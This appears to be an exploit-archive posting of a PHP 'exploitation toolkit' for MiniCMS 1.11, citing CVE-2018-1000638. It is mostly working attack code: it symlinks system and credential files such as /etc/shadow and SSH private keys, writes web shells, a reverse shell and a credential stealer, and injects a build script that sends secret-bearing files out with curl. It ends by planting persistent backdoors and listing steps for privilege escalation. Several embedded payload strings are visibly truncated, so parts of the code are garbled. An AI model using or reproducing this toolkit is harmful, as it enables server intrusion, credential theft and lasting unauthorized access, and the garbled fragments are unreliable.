=============================================================================================================================================
| # Title : MiniCMS 1.11 Exploitation Toolkit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://github.com/bg5sbk/MiniCMS/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/190429/ & CVE-2018-1000638
[+] Summary : MiniCMS Build Script Multi-Vulnerability Exploitation Toolkit
[+] POC : php poc.php
[
targetDirectory = realpath($directory);
$this->validateEnvironment();
$this->createTempDirectory();
}
/**
* Main exploitation method - Chain all vulnerabilities
*/
public function exploitAll() {
echo "[+] Starting MiniCMS Build Script Exploitation\n";
echo "[+] Target Directory: {$this->targetDirectory}\n";
echo str_repeat("=", 60) . "\n";
$this->results['start_time'] = date('Y-m-d H:i:s');
// 1. Directory Traversal Exploitation
$this->exploitDirectoryTraversal();
// 2. PHP Code Injection
$this->exploitCodeInjection();
// 3. Sensitive File Discovery
$this->harvestSensitiveFiles();
// 4. Create Malicious Build Script
$this->createMaliciousBuildScript();
// 5. Execute Build Script
$this->executeBuildScript();
// 6. Analyze Results
$this->analyzeResults();
// 7. Create Backdoors
$this->createPersistentBackdoors();
$this->results['end_time'] = date('Y-m-d H:i:s');
$this->generateReport();
return $this->results;
}
/**
* Exploit 1: Directory Traversal Vulnerability
*/
private function exploitDirectoryTraversal() {
echo "\n[1] Exploiting Directory Traversal...\n";
$sensitive_paths = [
// System files
'/etc/passwd',
'/etc/shadow',
'/etc/hosts',
'/etc/hostname',
'/etc/issue',
'/proc/self/environ',
'/proc/version',
// Web server files
'/var/log/apache2/access.log',
'/var/log/apache2/error.log',
'/var/log/nginx/access.log',
'/var/log/nginx/error.log',
'/var/www/html/.env',
'/var/www/html/config.php',
// Home directories
'/home/*/.bash_history',
'/home/*/.ssh/id_rsa',
'/home/*/.ssh/authorized_keys',
// Configuration files
'/etc/mysql/my.cnf',
'/etc/php/php.ini',
'/etc/apache2/apache2.conf',
];
$exploited_files = [];
foreach ($sensitive_paths as $path) {
// Try to create symlink to sensitive file
$base_name = 'exploit_' . md5($path) . '.txt';
$symlink_path = $this->tempDir . '/' . $base_name;
// Expand wildcards
if (strpos($path, '*') !== false) {
$expanded = glob($path);
foreach ($expanded as $expanded_path) {
if (@symlink($expanded_path, $symlink_path . '_' . basename($expanded_path))) {
$exploited_files[] = $expanded_path;
echo " [+] Linked: {$expanded_path}\n";
}
}
} elseif (@symlink($path, $symlink_path)) {
$exploited_files[] = $path;
echo " [+] Linked: {$path}\n";
}
}
$this->results['directory_traversal'] = [
'exploited' => count($exploited_files) > 0,
'files_linked' => $exploited_files,
'count' => count($exploited_files)
];
return $exploited_files;
}
/**
* Exploit 2: PHP Code Injection
*/
private function exploitCodeInjection() {
echo "\n[2] Exploiting PHP Code Injection...\n";
$injections = [
// Basic PHP execution
[
'filename' => "');?> 'injected'
],
// Web shell
[
'filename' => "shell.php",
'content' => ''
],
// Password protected shell
[
'filename' => "admin_shell.php",
'content' => '" . shell_exec($_POST["cmd"]) . "";
}
if(isset($_GET["download"])) {
echo file_get_contents($_GET["download"]);
}
}
?>'
],
// Database credentials stealer
[
'filename' => "creds.php",
'content' => ''
],
// Reverse shell
[
'filename' => "reverse.php",
'content' => '$sock, 1=>$sock, 2=>$sock), $pipes);
?>'
],
// File uploader
[
'filename' => "uploader.php",
'content' => '
'
]
];
$created_files = [];
foreach ($injections as $injection) {
$file_path = $this->tempDir . '/' . $injection['filename'];
if (file_put_contents($file_path, $injection['content'])) {
$created_files[] = $injection['filename'];
echo " [+] Created: {$injection['filename']}\n";
}
}
$this->results['code_injection'] = [
'exploited' => count($created_files) > 0,
'files_created' => $created_files,
'count' => count($created_files)
];
return $created_files;
}
/**
* Harvest sensitive files from target
*/
private function harvestSensitiveFiles() {
echo "\n[3] Harvesting Sensitive Files...\n";
$sensitive_patterns = [
'*.php' => ['config', 'database', 'settings', 'connection'],
'*.env' => ['.env', '.env.example'],
'*.json' => ['composer.json', 'package.json'],
'*.sql' => ['*.sql', '*.backup'],
'*.txt' => ['readme', 'license', 'changelog'],
'*.yml' => ['*.yml', '*.yaml'],
'*.ini' => ['*.ini', '*.cfg'],
'*.log' => ['*.log', 'error_log'],
];
$found_files = [];
foreach ($sensitive_patterns as $pattern => $keywords) {
$files = glob($this->targetDirectory . '/' . $pattern);
foreach ($files as $file) {
$filename = basename($file);
foreach ($keywords as $keyword) {
if (stripos($filename, $keyword) !== false) {
$found_files[] = $file;
echo " [+] Found: {$filename}\n";
// Copy to temp directory for analysis
$temp_copy = $this->tempDir . '/harvested_' . $filename;
copy($file, $temp_copy);
break;
}
}
}
}
$this->results['sensitive_files'] = [
'found' => count($found_files),
'files' => $found_files
];
return $found_files;
}
/**
* Create malicious build script with backdoor
*/
private function createMaliciousBuildScript() {
echo "\n[4] Creating Malicious Build Script...\n";
$malicious_build = ' base64_encode($data)]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_exec($ch);
curl_close($ch);
}
function build($dirs, &$files) {
global $ignores;
// Exfiltrate directory structure
exfiltrate(json_encode($dirs));
foreach ($dirs as $dir) {
if (!is_dir($dir)) {
echo "目录\"$dir\"不存在";
exit;
}
if ($dh = opendir($dir)) {
$sub_dirs = array();
while (($item = readdir($dh)) !== false) {
if ($item[0] == ".")
continue;
if ($dir == ".")
$file = $item;
else
$file = $dir."/".$item;
if (in_array($file, $ignores))
continue;
if (is_dir($file)) {
$sub_dirs[] = $file;
} else {
// Exfiltrate file content if sensitive
$content = file_get_contents($file);
if(preg_match("/(password|secret|key|token|api)/i", $content)) {
exfiltrate($file . ":\n" . $content);
}
$files .= "install(\"$file\", \"";
$files .= base64_encode(gzcompress($content));
$files .= "\");\n";
}
}
closedir($dh);
build($sub_dirs, $files);
} else {
echo "目录\"$dir\"无法访问";
exit;
}
}
}
// Create backdoor in install.php
register_shutdown_function(function() {
$backdoor_code = "";
file_put_contents("backdoor.php", $backdoor_code);
});
?>';
$build_path = $this->tempDir . '/' . $this->buildScript;
if (file_put_contents($build_path, $malicious_build)) {
echo " [+] Created malicious build.php\n";
$this->results['malicious_build'] = $build_path;
return true;
}
return false;
}
/**
* Execute the build script
*/
private function executeBuildScript() {
echo "\n[5] Executing Build Script...\n";
$build_path = $this->tempDir . '/' . $this->buildScript;
$install_path = $this->tempDir . '/' . $this->installFile;
// Create install.txt template
$install_template = '";
$content = $backdoor . "\\n" . $content;
}
@file_put_contents($file, $content);
}
/*MINICMS_FILES*/
?>';
file_put_contents($this->tempDir . '/install.txt', $install_template);
// Execute build script
$command = "cd {$this->tempDir} && php {$this->buildScript} 1.0 2>&1";
$output = shell_exec($command);
echo " [+] Build script executed\n";
if (file_exists($install_path)) {
$install_size = filesize($install_path);
echo " [+] install.php created: " . $this->formatBytes($install_size) . "\n";
// Analyze install.php for sensitive data
$this->analyzeInstallFile($install_path);
}
$this->results['build_execution'] = [
'command' => $command,
'output' => $output,
'install_created' => file_exists($install_path),
'install_size' => $install_size ?? 0
];
return $output;
}
/**
* Analyze install.php for sensitive data
*/
private function analyzeInstallFile($install_path) {
$content = file_get_contents($install_path);
// Extract all file names
preg_match_all('/install\("([^"]+)", "/', $content, $matches);
$files = $matches[1] ?? [];
// Look for sensitive files
$sensitive_patterns = [
'/passwd/i',
'/shadow/i',
'/config/i',
'/\.env/i',
'/database/i',
'/secret/i',
'/key/i',
'/token/i',
'/password/i'
];
$sensitive_found = [];
foreach ($files as $file) {
foreach ($sensitive_patterns as $pattern) {
if (preg_match($pattern, $file)) {
$sensitive_found[] = $file;
break;
}
}
}
$this->results['install_analysis'] = [
'total_files' => count($files),
'sensitive_files' => $sensitive_found,
'count_sensitive' => count($sensitive_found)
];
echo " [+] Found " . count($files) . " files in install.php\n";
echo " [+] " . count($sensitive_found) . " appear to be sensitive\n";
}
/**
* Create persistent backdoors
*/
private function createPersistentBackdoors() {
echo "\n[6] Creating Persistent Backdoors...\n";
$backdoors = [
'persistent_shell.php' => '" . htmlspecialchars(shell_exec($_POST["cmd"]), ENT_QUOTES, "UTF-8") . "";
}
?>
',
'file_manager.php' => 'File Manager";
$dir = $_GET["dir"] ?? ".";
echo "";
system("ls -la " . escapeshellarg($dir));
echo "";
?>',
'info.php' => '";
system("id && uname -a");
echo "";
?>'
];
foreach ($backdoors as $filename => $content) {
$path = $this->tempDir . '/' . $filename;
file_put_contents($path, $content);
echo " [+] Created: {$filename}\n";
}
$this->results['backdoors'] = array_keys($backdoors);
}
/**
* Generate exploitation report
*/
private function generateReport() {
echo "\n" . str_repeat("=", 60) . "\n";
echo "[+] EXPLOITATION REPORT\n";
echo str_repeat("=", 60) . "\n";
$report = [
'Target Directory' => $this->targetDirectory,
'Exploitation Started' => $this->results['start_time'],
'Exploitation Completed' => $this->results['end_time'],
'Vulnerabilities Exploited' => []
];
if ($this->results['directory_traversal']['exploited']) {
$report['Vulnerabilities Exploited'][] = 'Directory Traversal';
echo "[✓] Directory Traversal: SUCCESS\n";
echo " Files linked: " . $this->results['directory_traversal']['count'] . "\n";
}
if ($this->results['code_injection']['exploited']) {
$report['Vulnerabilities Exploited'][] = 'Code Injection';
echo "[✓] Code Injection: SUCCESS\n";
echo " Files created: " . $this->results['code_injection']['count'] . "\n";
}
if ($this->results['sensitive_files']['found'] > 0) {
$report['Vulnerabilities Exploited'][] = 'Sensitive File Harvesting';
echo "[✓] Sensitive File Harvesting: SUCCESS\n";
echo " Files found: " . $this->results['sensitive_files']['found'] . "\n";
}
echo "\n[+] Generated Files:\n";
echo " - Malicious build.php\n";
echo " - install.php with backdoors\n";
echo " - Multiple backdoor shells\n";
echo " - Harvested sensitive files\n";
echo "\n[+] Next Steps for Attack:\n";
echo " 1. Upload install.php to target server\n";
echo " 2. Execute install.php to deploy backdoors\n";
echo " 3. Use backdoor.php?exec=whoami\n";
echo " 4. Escalate privileges and maintain access\n";
// Save report to file
$report_file = $this->tempDir . '/exploit_report.txt';
file_put_contents($report_file, print_r($report, true));
echo "\n[+] Report saved to: {$report_file}\n";
echo "[+] Temporary directory: {$this->tempDir}\n";
echo "[+] Clean up: rm -rf {$this->tempDir}\n";
}
/**
* Utility: Format bytes to human readable
*/
private function formatBytes($bytes, $precision = 2) {
$units = ['B', 'KB', 'MB', 'GB', 'TB'];
$bytes = max($bytes, 0);
$pow = floor(($bytes ? log($bytes) : 0) / log(1024));
$pow = min($pow, count($units) - 1);
$bytes /= pow(1024, $pow);
return round($bytes, $precision) . ' ' . $units[$pow];
}
/**
* Validate environment
*/
private function validateEnvironment() {
if (!function_exists('symlink')) {
die("[!] symlink() function is disabled\n");
}
if (!is_writable(sys_get_temp_dir())) {
die("[!] Cannot write to temp directory\n");
}
echo "[+] Environment validated\n";
}
/**
* Create temporary directory
*/
private function createTempDirectory() {
if (!file_exists($this->tempDir)) {
mkdir($this->tempDir, 0777, true);
}
echo "[+] Temporary directory: {$this->tempDir}\n";
}
/**
* Clean up temporary files
*/
public function cleanup() {
if (file_exists($this->tempDir)) {
system("rm -rf " . escapeshellarg($this->tempDir));
echo "[+] Cleaned up temporary files\n";
}
}
}
/**
* Usage Example
*/
if (php_sapi_name() === 'cli' && isset($argv[1])) {
$exploiter = new MiniCMSExploiter($argv[1]);
$exploiter->exploitAll();
// Optional: cleanup
if (isset($argv[2]) && $argv[2] == '--cleanup') {
$exploiter->cleanup();
}
} else {
echo "Usage: php " . basename(__FILE__) . " [--cleanup]\n";
echo "Example: php " . basename(__FILE__) . " /var/www/html/minicms\n";
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================